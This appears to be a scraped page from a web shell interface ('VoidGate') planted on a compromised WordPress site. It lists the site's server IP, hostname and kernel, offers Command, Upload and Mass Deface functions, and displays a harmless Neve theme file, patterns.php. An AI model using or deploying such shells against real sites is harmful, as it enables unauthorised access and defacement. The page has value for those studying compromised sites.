ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
173.201.252.198 / gabrieltopman.com
System
:
Linux p3plzcpnl482572.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Command
|
Upload
|
Mass Deface
|
Create
:
/
home
/
l1ltxx5gqn9k
/
public_html
/
wp-content
/
themes
/
neve
/
inc
/
compatibility
/
Viewing: patterns.php
<?php /** * Patterns Compatibility. * * @package Patterns.php */ namespace Neve\Compatibility; /** * Class Patterns * * @package Neve\Compatibility */ class Patterns { /** * Define list of the patterns to load. * * @var string[] Patterns list. */ private $patterns = [ 'dark-header-centered-content', 'two-columns-image-text', 'three-columns-images-text', 'three-columns-images-text', 'three-columns-images-texts-content', 'four-columns-team-members', 'two-columns-centered-content', 'two-columns-with-text', 'testimonials-columns', 'gallery-grid-buttons', 'gallery-title-buttons', 'light-header-left-aligned-content', ]; /** * Register patterns bootstrap hook. */ public function init() { add_action( 'init', [ $this, 'define_patterns' ] ); } /** * Load patterns. */ public function define_patterns() { if ( ! function_exists( 'register_block_pattern' ) ) { return; } foreach ( $this->patterns as $pattern ) { register_block_pattern( 'neve/' . $pattern, require __DIR__ . '/block-patterns/' . $pattern . '.php' ); } } }
Coded With 💗 by
0x6ick